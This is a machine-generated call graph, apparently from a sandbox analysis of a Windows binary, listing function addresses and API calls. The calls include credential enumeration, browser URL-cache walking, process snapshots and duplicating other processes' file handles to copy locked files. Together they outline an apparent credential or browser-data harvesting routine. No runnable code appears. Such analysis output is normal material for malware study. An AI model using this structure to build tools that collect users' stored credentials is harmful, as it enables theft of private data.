38108->38144 38112 411ae2 memset 38111->38112 38113 411b8f 38111->38113 38184 409bca GetModuleFileNameW 38112->38184 38125 411a8b 38113->38125 38115 411b0a wcsrchr 38116 411b22 wcscat 38115->38116 38117 411b1f 38115->38117 38185 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38116->38185 38117->38116 38119 411b67 38186 402afb 38119->38186 38123 411b7f 38242 40ea13 SendMessageW memset SendMessageW 38123->38242 38126 402afb 27 API calls 38125->38126 38127 411ac0 38126->38127 38128 4110dc 38127->38128 38129 41113e 38128->38129 38134 4110f0 38128->38134 38267 40969c LoadCursorW SetCursor 38129->38267 38131 411143 38141 40b633 free 38131->38141 38268 444a54 38131->38268 38271 4032b4 38131->38271 38132 4110f7 _wcsicmp 38132->38134 38133 411157 38135 40ada2 _wcsicmp 38133->38135 38134->38129 38134->38132 38289 410c46 10 API calls 38134->38289 38138 411167 38135->38138 38136 4111af 38138->38136 38139 4111a6 qsort 38138->38139 38139->38136 38141->38133 38143->37939 38145 40eb10 38144->38145 38157 40e8e0 38145->38157 38148 40eb6c memcpy memcpy 38149 40ebb7 38148->38149 38149->38148 38150 40ebf2 ??2@YAPAXI ??2@YAPAXI 38149->38150 38153 40d134 16 API calls 38149->38153 38151 40ec2e ??2@YAPAXI 38150->38151 38152 40ec65 38150->38152 38151->38152 38167 40ea7f 38152->38167 38153->38149 38156 402f49 38156->37939 38158 40e8f2 38157->38158 38159 40e8eb ??3@YAXPAX 38157->38159 38160 40e900 38158->38160 38161 40e8f9 ??3@YAXPAX 38158->38161 38159->38158 38162 40e911 38160->38162 38163 40e90a ??3@YAXPAX 38160->38163 38161->38160 38164 40e931 ??2@YAPAXI ??2@YAPAXI 38162->38164 38165 40e921 ??3@YAXPAX 38162->38165 38166 40e92a ??3@YAXPAX 38162->38166 38163->38162 38164->38148 38165->38166 38166->38164 38168 40aa04 free 38167->38168 38169 40ea88 38168->38169 38170 40aa04 free 38169->38170 38171 40ea90 38170->38171 38172 40aa04 free 38171->38172 38173 40ea98 38172->38173 38174 40aa04 free 38173->38174 38175 40eaa0 38174->38175 38176 40a9ce 4 API calls 38175->38176 38177 40eab3 38176->38177 38178 40a9ce 4 API calls 38177->38178 38179 40eabd 38178->38179 38180 40a9ce 4 API calls 38179->38180 38181 40eac7 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40ead1 38182->38183 38183->38156 38184->38115 38185->38119 38243 40b2cc 38186->38243 38188 402b0a 38189 40b2cc 27 API calls 38188->38189 38190 402b23 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402b3a 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402b54 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402b6b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b82 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b99 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402bb0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402bc7 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402bde 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bf5 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402c0c 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402c23 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402c3a 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c51 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c68 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c7f 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c99 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402cb3 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402cd5 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402cf0 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402d0b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402d26 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402d3e 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d59 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d78 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d93 38239->38240 38241 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38240->38241 38241->38123 38242->38113 38246 40b58d 38243->38246 38245 40b2d1 38245->38188 38247 40b5a4 GetModuleHandleW FindResourceW 38246->38247 38248 40b62e 38246->38248 38249 40b5c2 LoadResource 38247->38249 38251 40b5e7 38247->38251 38248->38245 38250 40b5d0 SizeofResource LockResource 38249->38250 38249->38251 38250->38251 38251->38248 38259 40afcf 38251->38259 38253 40b608 memcpy 38262 40b4d3 memcpy 38253->38262 38255 40b61e 38263 40b3c1 18 API calls 38255->38263 38257 40b626 38264 40b04b 38257->38264 38260 40b04b ??3@YAXPAX 38259->38260 38261 40afd7 ??2@YAPAXI 38260->38261 38261->38253 38262->38255 38263->38257 38265 40b051 ??3@YAXPAX 38264->38265 38266 40b05f 38264->38266 38265->38266 38266->38248 38267->38131 38269 444a64 FreeLibrary 38268->38269 38270 444a83 38268->38270 38269->38270 38270->38133 38272 4032c4 38271->38272 38273 40b633 free 38272->38273 38274 403316 38273->38274 38290 44553b 38274->38290 38278 403480 38488 40368c 15 API calls 38278->38488 38280 403489 38281 40b633 free 38280->38281 38283 403495 38281->38283 38282 40333c 38282->38278 38284 4033a9 memset memcpy 38282->38284 38285 4033ec wcscmp 38282->38285 38486 4028e7 11 API calls 38282->38486 38487 40f508 6 API calls 38282->38487 38283->38133 38284->38282 38284->38285 38285->38282 38288 403421 _wcsicmp 38288->38282 38289->38134 38291 445548 38290->38291 38292 445599 38291->38292 38489 40c768 38291->38489 38293 4455a8 memset 38292->38293 38300 4457f2 38292->38300 38573 403988 38293->38573 38303 445854 38300->38303 38676 403e2d memset memset memset memset memset 38300->38676 38301 4455e5 38312 445672 38301->38312 38317 44560f 38301->38317 38302 4458bb memset memset 38305 414c2e 17 API calls 38302->38305 38356 4458aa 38303->38356 38699 403c9c memset memset memset memset memset 38303->38699 38308 4458f9 38305->38308 38307 44595e memset memset 38315 414c2e 17 API calls 38307->38315 38316 40b2cc 27 API calls 38308->38316 38310 44558c 38557 444b06 38310->38557 38311 44557a 38311->38310 38772 4136c0 CoTaskMemFree 38311->38772 38584 403fbe memset memset memset memset memset 38312->38584 38313 445a00 memset memset 38722 414c2e 38313->38722 38314 445b22 38320 445bca 38314->38320 38321 445b38 memset memset memset 38314->38321 38325 44599c 38315->38325 38327 445909 38316->38327 38329 4087b3 338 API calls 38317->38329 38319 445849 38788 40b1ab free free 38319->38788 38328 445c8b memset memset 38320->38328 38394 445cf0 38320->38394 38332 445bd4 38321->38332 38333 445b98 38321->38333 38326 40b2cc 27 API calls 38325->38326 38340 4459ac 38326->38340 38337 409d1f 6 API calls 38327->38337 38341 414c2e 17 API calls 38328->38341 38338 445621 38329->38338 38330 44589f 38789 40b1ab free free 38330->38789 38331 445585 38773 41366b FreeLibrary 38331->38773 38347 414c2e 17 API calls 38332->38347 38333->38332 38343 445ba2 38333->38343 38336 403335 38485 4452e5 45 API calls 38336->38485 38351 445919 38337->38351 38774 4454bf 20 API calls 38338->38774 38339 445823 38339->38319 38361 4087b3 338 API calls 38339->38361 38352 409d1f 6 API calls 38340->38352 38353 445cc9 38341->38353 38861 4099c6 wcslen 38343->38861 38344 4456b2 38776 40b1ab free free 38344->38776 38346 40b2cc 27 API calls 38357 445a4f 38346->38357 38348 445be2 38347->38348 38359 40b2cc 27 API calls 38348->38359 38349 445d3d 38379 40b2cc 27 API calls 38349->38379 38350 445d88 memset memset memset 38362 414c2e 17 API calls 38350->38362 38790 409b98 GetFileAttributesW 38351->38790 38363 4459bc 38352->38363 38364 409d1f 6 API calls 38353->38364 38354 445879 38354->38330 38375 4087b3 338 API calls 38354->38375 38356->38302 38380 44594a 38356->38380 38738 409d1f wcslen wcslen 38357->38738 38369 445bf3 38359->38369 38361->38339 38372 445dde 38362->38372 38857 409b98 GetFileAttributesW 38363->38857 38374 445ce1 38364->38374 38365 445bb3 38864 445403 memset 38365->38864 38366 445680 38366->38344 38607 4087b3 memset 38366->38607 38378 409d1f 6 API calls 38369->38378 38370 445928 38370->38380 38791 40b6ef 38370->38791 38381 40b2cc 27 API calls 38372->38381 38881 409b98 GetFileAttributesW 38374->38881 38375->38354 38377 40b2cc 27 API calls 38386 445a94 38377->38386 38388 445c07 38378->38388 38389 445d54 _wcsicmp 38379->38389 38380->38307 38393 4459ed 38380->38393 38392 445def 38381->38392 38382 4459cb 38382->38393 38402 40b6ef 253 API calls 38382->38402 38743 40ae18 38386->38743 38387 44566d 38387->38300 38658 413d4c 38387->38658 38398 445389 259 API calls 38388->38398 38399 445d71 38389->38399 38462 445d67 38389->38462 38391 445665 38775 40b1ab free free 38391->38775 38400 409d1f 6 API calls 38392->38400 38393->38313 38393->38314 38394->38336 38394->38349 38394->38350 38395 445389 259 API calls 38395->38320 38404 445c17 38398->38404 38882 445093 23 API calls 38399->38882 38407 445e03 38400->38407 38402->38393 38403 4456d8 38409 40b2cc 27 API calls 38403->38409 38410 40b2cc 27 API calls 38404->38410 38406 44563c 38406->38391 38412 4087b3 338 API calls 38406->38412 38883 409b98 GetFileAttributesW 38407->38883 38408 40b6ef 253 API calls 38408->38336 38414 4456e2 38409->38414 38415 445c23 38410->38415 38411 445d83 38411->38336 38412->38406 38777 413fa6 _wcsicmp _wcsicmp 38414->38777 38419 409d1f 6 API calls 38415->38419 38417 445e12 38423 445e6b 38417->38423 38430 40b2cc 27 API calls 38417->38430 38421 445c37 38419->38421 38420 4456eb 38426 4456fd memset memset memset memset 38420->38426 38427 4457ea 38420->38427 38428 445389 259 API calls 38421->38428 38422 445b17 38858 40aebe 38422->38858 38885 445093 23 API calls 38423->38885 38778 409c70 wcscpy wcsrchr 38426->38778 38781 413d29 38427->38781 38433 445c47 38428->38433 38434 445e33 38430->38434 38431 445e7e 38436 445f67 38431->38436 38439 40b2cc 27 API calls 38433->38439 38440 409d1f 6 API calls 38434->38440 38445 40b2cc 27 API calls 38436->38445 38437 445ab2 memset 38441 40b2cc 27 API calls 38437->38441 38443 445c53 38439->38443 38444 445e47 38440->38444 38446 445aa1 38441->38446 38442 409c70 2 API calls 38447 44577e 38442->38447 38448 409d1f 6 API calls 38443->38448 38884 409b98 GetFileAttributesW 38444->38884 38450 445f73 38445->38450 38446->38422 38446->38437 38451 409d1f 6 API calls 38446->38451 38750 40add4 38446->38750 38755 445389 38446->38755 38764 40ae51 38446->38764 38452 409c70 2 API calls 38447->38452 38453 445c67 38448->38453 38455 409d1f 6 API calls 38450->38455 38451->38446 38456 44578d 38452->38456 38457 445389 259 API calls 38453->38457 38454 445e56 38454->38423 38460 445e83 memset 38454->38460 38458 445f87 38455->38458 38456->38427 38464 40b2cc 27 API calls 38456->38464 38457->38320 38888 409b98 GetFileAttributesW 38458->38888 38463 40b2cc 27 API calls 38460->38463 38462->38336 38462->38408 38465 445eab 38463->38465 38466 4457a8 38464->38466 38467 409d1f 6 API calls 38465->38467 38468 409d1f 6 API calls 38466->38468 38469 445ebf 38467->38469 38470 4457b8 38468->38470 38471 40ae18 9 API calls 38469->38471 38780 409b98 GetFileAttributesW 38470->38780 38481 445ef5 38471->38481 38473 4457c7 38473->38427 38475 4087b3 338 API calls 38473->38475 38474 40ae51 9 API calls 38474->38481 38475->38427 38476 445f5c 38478 40aebe FindClose 38476->38478 38477 40add4 2 API calls 38477->38481 38478->38436 38479 40b2cc 27 API calls 38479->38481 38480 409d1f 6 API calls 38480->38481 38481->38474 38481->38476 38481->38477 38481->38479 38481->38480 38483 445f3a 38481->38483 38886 409b98 GetFileAttributesW 38481->38886 38887 445093 23 API calls 38483->38887 38485->38282 38486->38288 38487->38282 38488->38280 38490 40c775 38489->38490 38889 40b1ab free free 38490->38889 38492 40c788 38890 40b1ab free free 38492->38890 38494 40c790 38891 40b1ab free free 38494->38891 38496 40c798 38497 40aa04 free 38496->38497 38498 40c7a0 38497->38498 38892 40c274 memset 38498->38892 38503 40a8ab 9 API calls 38504 40c7c3 38503->38504 38505 40a8ab 9 API calls 38504->38505 38506 40c7d0 38505->38506 38921 40c3c3 38506->38921 38510 40c877 38519 40bdb0 38510->38519 38511 40c86c 38963 4053fe 39 API calls 38511->38963 38512 40c7e5 38512->38510 38512->38511 38518 40c634 50 API calls 38512->38518 38946 40a706 38512->38946 38518->38512 39246 404363 38519->39246 38522 40bf63 39266 40440c 38522->39266 38523 40bdee 38523->38522 38527 40b2cc 27 API calls 38523->38527 38524 40bddf CredEnumerateW 38524->38523 38528 40be02 wcslen 38527->38528 38529 40bf5d LocalFree 38528->38529 38536 40be1e 38528->38536 38529->38522 38530 40be26 wcsncmp 38530->38536 38533 40be7d memset 38534 40bea7 memcpy 38533->38534 38533->38536 38535 40bf11 wcschr 38534->38535 38534->38536 38535->38536 38536->38529 38536->38530 38536->38533 38536->38534 38536->38535 38537 40b2cc 27 API calls 38536->38537 38539 40bf43 LocalFree 38536->38539 39269 40bd5d 28 API calls 38536->39269 39270 404423 38536->39270 38538 40bef6 _wcsnicmp 38537->38538 38538->38535 38538->38536 38539->38536 38540 4135f7 39285 4135e0 38540->39285 38543 40b2cc 27 API calls 38544 41360d 38543->38544 38545 40a804 8 API calls 38544->38545 38546 413613 38545->38546 38547 41361b 38546->38547 38548 41363e 38546->38548 38549 40b273 27 API calls 38547->38549 38550 4135e0 FreeLibrary 38548->38550 38551 413625 GetProcAddress 38549->38551 38552 413643 38550->38552 38551->38548 38553 413648 38551->38553 38552->38311 38554 413658 38553->38554 38555 4135e0 FreeLibrary 38553->38555 38554->38311 38556 413666 38555->38556 38556->38311 39288 4449b9 38557->39288 38560 444c1f 38560->38292 38561 4449b9 42 API calls 38563 444b4b 38561->38563 38562 444c15 38565 4449b9 42 API calls 38562->38565 38563->38562 39309 444972 GetVersionExW 38563->39309 38565->38560 38566 444b99 memcmp 38571 444b8c 38566->38571 38567 444c0b 39313 444a85 42 API calls 38567->39313 38571->38566 38571->38567 39310 444aa5 42 API calls 38571->39310 39311 40a7a0 GetVersionExW 38571->39311 39312 444a85 42 API calls 38571->39312 38574 40399d 38573->38574 39314 403a16 38574->39314 38576 403a09 39328 40b1ab free free 38576->39328 38578 403a12 wcsrchr 38578->38301 38579 4039a3 38579->38576 38582 4039f4 38579->38582 39325 40a02c CreateFileW 38579->39325 38582->38576 38583 4099c6 2 API calls 38582->38583 38583->38576 38585 414c2e 17 API calls 38584->38585 38586 404048 38585->38586 38587 414c2e 17 API calls 38586->38587 38588 404056 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 404073 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 40408e 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4040a6 38593->38594 38595 403af5 20 API calls 38594->38595 38596 4040ba 38595->38596 38597 403af5 20 API calls 38596->38597 38598 4040cb 38597->38598 39355 40414f memset 38598->39355 38600 404140 39369 40b1ab free free 38600->39369 38602 4040ec memset 38605 4040e0 38602->38605 38603 404148 38603->38366 38604 4099c6 2 API calls 38604->38605 38605->38600 38605->38602 38605->38604 38606 40a8ab 9 API calls 38605->38606 38606->38605 39382 40a6e6 WideCharToMultiByte 38607->39382 38609 4087ed 39383 4095d9 memset 38609->39383 38612 408809 memset memset memset memset memset 38613 40b2cc 27 API calls 38612->38613 38614 4088a1 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4088b1 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40890e 38627->38628 38629 40b2cc 27 API calls 38628->38629 38639 408953 38639->38366 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38403 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39808 413f27 38665->39808 38667->38664 38668->38664 38669 413e1f 38670 413e37 GetModuleHandleW 38669->38670 38673 413e6a QueryFullProcessImageNameW 38669->38673 39813 413959 38669->39813 39829 413ca4 38669->39829 38670->38669 38672 413e46 GetProcAddress 38670->38672 38672->38669 38673->38669 38675 413ea2 CloseHandle 38675->38664 38677 414c2e 17 API calls 38676->38677 38678 403eb7 38677->38678 38679 414c2e 17 API calls 38678->38679 38680 403ec5 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403ee2 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 403efd 38683->38684 38685 409d1f 6 API calls 38684->38685 38686 403f15 38685->38686 38687 403af5 20 API calls 38686->38687 38688 403f29 38687->38688 38689 403af5 20 API calls 38688->38689 38690 403f3a 38689->38690 38691 40414f 33 API calls 38690->38691 38697 403f4f 38691->38697 38692 403faf 39843 40b1ab free free 38692->39843 38694 403f5b memset 38694->38697 38695 403fb7 38695->38339 38696 4099c6 2 API calls 38696->38697 38697->38692 38697->38694 38697->38696 38698 40a8ab 9 API calls 38697->38698 38698->38697 38700 414c2e 17 API calls 38699->38700 38701 403d26 38700->38701 38702 414c2e 17 API calls 38701->38702 38703 403d34 38702->38703 38704 409d1f 6 API calls 38703->38704 38705 403d51 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 403d6c 38706->38707 38708 409d1f 6 API calls 38707->38708 38709 403d84 38708->38709 38710 403af5 20 API calls 38709->38710 38711 403d98 38710->38711 38712 403af5 20 API calls 38711->38712 38713 403da9 38712->38713 38714 40414f 33 API calls 38713->38714 38719 403dbe 38714->38719 38715 403e1e 39844 40b1ab free free 38715->39844 38717 403dca memset 38717->38719 38718 403e26 38718->38354 38719->38715 38719->38717 38720 4099c6 2 API calls 38719->38720 38721 40a8ab 9 API calls 38719->38721 38720->38719 38721->38719 38723 414b81 9 API calls 38722->38723 38725 414c40 38723->38725 38724 414c73 memset 38727 414c94 38724->38727 38725->38724 39845 409cea 38725->39845 39848 414592 RegOpenKeyExW 38727->39848 38730 414c64 SHGetSpecialFolderPathW 38732 414d0b 38730->38732 38731 414cc1 38733 414cf4 wcscpy 38731->38733 39849 414bb0 wcscpy 38731->39849 38732->38346 38733->38732 38735 414cd2 39850 4145ac RegQueryValueExW 38735->39850 38737 414ce9 RegCloseKey 38737->38733 38739 409d62 38738->38739 38740 409d43 wcscpy 38738->38740 38739->38377 38741 409719 2 API calls 38740->38741 38742 409d51 wcscat 38741->38742 38742->38739 38744 40aebe FindClose 38743->38744 38745 40ae21 38744->38745 38746 4099c6 2 API calls 38745->38746 38747 40ae35 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 40ae49 38748->38749 38749->38446 38751 40ade0 38750->38751 38754 40ae0f 38750->38754 38752 40ade7 wcscmp 38751->38752 38751->38754 38753 40adfe wcscmp 38752->38753 38752->38754 38753->38754 38754->38446 38756 40ae18 9 API calls 38755->38756 38761 4453c4 38756->38761 38757 40ae51 9 API calls 38757->38761 38758 4453f3 38760 40aebe FindClose 38758->38760 38759 40add4 2 API calls 38759->38761 38762 4453fe 38760->38762 38761->38757 38761->38758 38761->38759 38763 445403 254 API calls 38761->38763 38762->38446 38763->38761 38765 40ae7b FindNextFileW 38764->38765 38766 40ae5c FindFirstFileW 38764->38766 38767 40ae94 38765->38767 38768 40ae8f 38765->38768 38766->38767 38770 40aeb6 38767->38770 38771 409d1f 6 API calls 38767->38771 38769 40aebe FindClose 38768->38769 38769->38767 38770->38446 38771->38770 38772->38331 38773->38310 38774->38406 38775->38387 38776->38387 38777->38420 38779 409c89 38778->38779 38779->38442 38780->38473 38782 413d39 38781->38782 38783 413d2f FreeLibrary 38781->38783 38784 40b633 free 38782->38784 38783->38782 38785 413d42 38784->38785 38786 40b633 free 38785->38786 38787 413d4a 38786->38787 38787->38300 38788->38303 38789->38356 38790->38370 38792 44db70 38791->38792 38793 40b6fc memset 38792->38793 38794 409c70 2 API calls 38793->38794 38795 40b732 wcsrchr 38794->38795 38796 40b743 38795->38796 38797 40b746 memset 38795->38797 38796->38797 38798 40b2cc 27 API calls 38797->38798 38799 40b76f 38798->38799 38800 409d1f 6 API calls 38799->38800 38801 40b783 38800->38801 39851 409b98 GetFileAttributesW 38801->39851 38803 40b792 38804 40b7c2 38803->38804 38805 409c70 2 API calls 38803->38805 39852 40bb98 38804->39852 38807 40b7a5 38805->38807 38809 40b2cc 27 API calls 38807->38809 38813 40b7b2 38809->38813 38810 40b837 CloseHandle 38812 40b83e memset 38810->38812 38811 40b817 38814 409a45 3 API calls 38811->38814 39885 40a6e6 WideCharToMultiByte 38812->39885 38816 409d1f 6 API calls 38813->38816 38817 40b827 CopyFileW 38814->38817 38816->38804 38817->38812 38818 40b866 38819 444432 121 API calls 38818->38819 38821 40b879 38819->38821 38820 40bad5 38823 40baeb 38820->38823 38824 40bade DeleteFileW 38820->38824 38821->38820 38822 40b273 27 API calls 38821->38822 38825 40b89a 38822->38825 38826 40b04b ??3@YAXPAX 38823->38826 38824->38823 38827 438552 134 API calls 38825->38827 38828 40baf3 38826->38828 38829 40b8a4 38827->38829 38828->38380 38830 40bacd 38829->38830 38832 4251c4 137 API calls 38829->38832 38831 443d90 111 API calls 38830->38831 38831->38820 38855 40b8b8 38832->38855 38833 40bac6 39895 424f26 123 API calls 38833->39895 38834 40b8bd memset 39886 425413 17 API calls 38834->39886 38837 425413 17 API calls 38837->38855 38840 40a71b MultiByteToWideChar 38840->38855 38841 40a734 MultiByteToWideChar 38841->38855 38844 40b9b5 memcmp 38844->38855 38845 4099c6 2 API calls 38845->38855 38846 404423 38 API calls 38846->38855 38849 40bb3e memset memcpy 39896 40a734 MultiByteToWideChar 38849->39896 38850 4251c4 137 API calls 38850->38855 38852 40bb88 LocalFree 38852->38855 38855->38833 38855->38834 38855->38837 38855->38840 38855->38841 38855->38844 38855->38845 38855->38846 38855->38849 38855->38850 38856 40ba5f memcmp 38855->38856 39887 4253ef 16 API calls 38855->39887 39888 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38855->39888 39889 4253af 17 API calls 38855->39889 39890 4253cf 17 API calls 38855->39890 39891 447280 memset 38855->39891 39892 447960 memset memcpy memcpy memcpy 38855->39892 39893 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38855->39893 39894 447920 memcpy memcpy memcpy 38855->39894 38856->38855 38857->38382 38859 40aed1 38858->38859 38860 40aec7 FindClose 38858->38860 38859->38314 38860->38859 38862 4099d7 38861->38862 38863 4099da memcpy 38861->38863 38862->38863 38863->38365 38865 40b2cc 27 API calls 38864->38865 38866 44543f 38865->38866 38867 409d1f 6 API calls 38866->38867 38868 44544f 38867->38868 39980 409b98 GetFileAttributesW 38868->39980 38870 44545e 38871 445476 38870->38871 38872 40b6ef 253 API calls 38870->38872 38873 40b2cc 27 API calls 38871->38873 38872->38871 38874 445482 38873->38874 38875 409d1f 6 API calls 38874->38875 38876 445492 38875->38876 39981 409b98 GetFileAttributesW 38876->39981 38878 4454a1 38879 4454b9 38878->38879 38880 40b6ef 253 API calls 38878->38880 38879->38395 38880->38879 38881->38394 38882->38411 38883->38417 38884->38454 38885->38431 38886->38481 38887->38481 38888->38462 38889->38492 38890->38494 38891->38496 38893 414c2e 17 API calls 38892->38893 38894 40c2ae 38893->38894 38964 40c1d3 38894->38964 38899 40c3be 38916 40a8ab 38899->38916 38900 40afcf 2 API calls 38901 40c2fd FindFirstUrlCacheEntryW 38900->38901 38902 40c3b6 38901->38902 38903 40c31e wcschr 38901->38903 38904 40b04b ??3@YAXPAX 38902->38904 38905 40c331 38903->38905 38906 40c35e FindNextUrlCacheEntryW 38903->38906 38904->38899 38908 40a8ab 9 API calls 38905->38908 38906->38903 38907 40c373 GetLastError 38906->38907 38909 40c3ad FindCloseUrlCache 38907->38909 38910 40c37e 38907->38910 38911 40c33e wcschr 38908->38911 38909->38902 38912 40afcf 2 API calls 38910->38912 38911->38906 38913 40c34f 38911->38913 38914 40c391 FindNextUrlCacheEntryW 38912->38914 38915 40a8ab 9 API calls 38913->38915 38914->38903 38914->38909 38915->38906 39173 40a97a 38916->39173 38919 40a8cc 38919->38503 38920 40a8d0 7 API calls 38920->38919 39178 40b1ab free free 38921->39178 38923 40c3dd 38924 40b2cc 27 API calls 38923->38924 38925 40c3e7 38924->38925 39179 414592 RegOpenKeyExW 38925->39179 38927 40c3f4 38928 40c50e 38927->38928 38929 40c3ff 38927->38929 38943 405337 38928->38943 38930 40a9ce 4 API calls 38929->38930 38931 40c418 memset 38930->38931 39180 40aa1d 38931->39180 38934 40c471 38936 40c47a _wcsupr 38934->38936 38935 40c505 RegCloseKey 38935->38928 38937 40a8d0 7 API calls 38936->38937 38938 40c498 38937->38938 38939 40a8d0 7 API calls 38938->38939 38940 40c4ac memset 38939->38940 38941 40aa1d 38940->38941 38942 40c4e4 RegEnumValueW 38941->38942 38942->38935 38942->38936 39182 405220 38943->39182 38947 4099c6 2 API calls 38946->38947 38948 40a714 _wcslwr 38947->38948 38949 40c634 38948->38949 39239 405361 38949->39239 38952 40c65c wcslen 39242 4053b6 39 API calls 38952->39242 38953 40c71d wcslen 38953->38512 38955 40c677 38956 40c713 38955->38956 39243 40538b 39 API calls 38955->39243 39245 4053df 39 API calls 38956->39245 38959 40c6a5 38959->38956 38960 40c6a9 memset 38959->38960 38961 40c6d3 38960->38961 39244 40c589 44 API calls 38961->39244 38963->38510 38965 40ae18 9 API calls 38964->38965 38971 40c210 38965->38971 38966 40ae51 9 API calls 38966->38971 38967 40c264 38968 40aebe FindClose 38967->38968 38970 40c26f 38968->38970 38969 40add4 2 API calls 38969->38971 38976 40e5ed memset memset 38970->38976 38971->38966 38971->38967 38971->38969 38972 40c231 _wcsicmp 38971->38972 38973 40c1d3 35 API calls 38971->38973 38972->38971 38974 40c248 38972->38974 38973->38971 38989 40c084 22 API calls 38974->38989 38977 414c2e 17 API calls 38976->38977 38978 40e63f 38977->38978 38979 409d1f 6 API calls 38978->38979 38980 40e658 38979->38980 38990 409b98 GetFileAttributesW 38980->38990 38982 40e667 38983 40e680 38982->38983 38984 409d1f 6 API calls 38982->38984 38991 409b98 GetFileAttributesW 38983->38991 38984->38983 38986 40e68f 38987 40c2d8 38986->38987 38992 40e4b2 38986->38992 38987->38899 38987->38900 38989->38971 38990->38982 38991->38986 39013 40e01e 38992->39013 38994 40e593 38995 40e5b0 38994->38995 38996 40e59c DeleteFileW 38994->38996 38997 40b04b ??3@YAXPAX 38995->38997 38996->38995 38999 40e5bb 38997->38999 38998 40e521 38998->38994 39036 40e175 38998->39036 39001 40e5c4 CloseHandle 38999->39001 39002 40e5cc 38999->39002 39001->39002 39004 40b633 free 39002->39004 39003 40e573 39005 40e584 39003->39005 39006 40e57c CloseHandle 39003->39006 39007 40e5db 39004->39007 39079 40b1ab free free 39005->39079 39006->39005 39009 40b633 free 39007->39009 39010 40e5e3 39009->39010 39010->38987 39012 40e540 39012->39003 39056 40e2ab 39012->39056 39080 406214 39013->39080 39016 40e16b 39016->38998 39019 40afcf 2 API calls 39020 40e08d OpenProcess 39019->39020 39021 40e0a4 GetCurrentProcess DuplicateHandle 39020->39021 39025 40e152 39020->39025 39022 40e0d0 GetFileSize 39021->39022 39023 40e14a CloseHandle 39021->39023 39116 409a45 GetTempPathW 39022->39116 39023->39025 39024 40e160 39028 40b04b ??3@YAXPAX 39024->39028 39025->39024 39027 406214 22 API calls 39025->39027 39027->39024 39028->39016 39029 40e0ea 39119 4096dc CreateFileW 39029->39119 39031 40e0f1 CreateFileMappingW 39032 40e140 CloseHandle CloseHandle 39031->39032 39033 40e10b MapViewOfFile 39031->39033 39032->39023 39034 40e13b CloseHandle 39033->39034 39035 40e11f WriteFile UnmapViewOfFile 39033->39035 39034->39032 39035->39034 39037 40e18c 39036->39037 39120 406b90 39037->39120 39040 40e1a7 memset 39046 40e1e8 39040->39046 39041 40e299 39152 4069a3 39041->39152 39047 40e283 39046->39047 39048 40dd50 _wcsicmp 39046->39048 39054 40e244 _snwprintf 39046->39054 39130 406e8f 39046->39130 39159 40742e 8 API calls 39046->39159 39160 40aae3 wcslen wcslen _memicmp 39046->39160 39161 406b53 SetFilePointerEx ReadFile 39046->39161 39049 40e291 39047->39049 39050 40e288 free 39047->39050 39048->39046 39051 40aa04 free 39049->39051 39050->39049 39051->39041 39055 40a8d0 7 API calls 39054->39055 39055->39046 39057 40e2c2 39056->39057 39058 406b90 11 API calls 39057->39058 39059 40e2d3 39058->39059 39060 40e4a0 39059->39060 39062 406e8f 13 API calls 39059->39062 39065 40e489 39059->39065 39068 40dd50 _wcsicmp 39059->39068 39074 40e3e0 memcpy 39059->39074 39075 40e3fb memcpy 39059->39075 39076 40e3b3 wcschr 39059->39076 39077 40e416 memcpy 39059->39077 39078 40e431 memcpy 39059->39078 39162 40dd50 _wcsicmp 39059->39162 39171 40742e 8 API calls 39059->39171 39172 406b53 SetFilePointerEx ReadFile 39059->39172 39061 4069a3 2 API calls 39060->39061 39063 40e4ab 39061->39063 39062->39059 39063->39012 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068->39059 39069->39060 39071 40e376 memset 39163 40aa29 39071->39163 39074->39059 39075->39059 39076->39059 39077->39059 39078->39059 39079->38994 